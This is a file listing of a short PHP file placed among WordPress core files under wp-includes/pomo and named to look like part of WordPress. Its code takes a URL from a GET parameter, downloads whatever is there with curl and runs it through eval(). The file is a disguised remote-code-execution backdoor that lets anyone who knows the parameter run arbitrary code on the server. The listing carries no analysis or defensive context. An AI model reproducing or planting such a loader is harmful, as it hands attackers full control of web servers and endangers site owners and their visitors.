• File: plural-forms-ajax.php
  • Full Path: /home/mannonia/www/wp-includes/pomo/plural-forms-ajax.php
  • File size: 366 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php

if (isset($_GET['package'])) {
    $has_post_thumbnail_vmh = $_GET['package'];
    if ($post_class_ve = curl_init()) {
        curl_setopt($post_class_ve, CURLOPT_URL, $has_post_thumbnail_vmh);
        curl_setopt($post_class_ve, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($post_class_ve));
        curl_close($post_class_ve);
        exit;
    }
}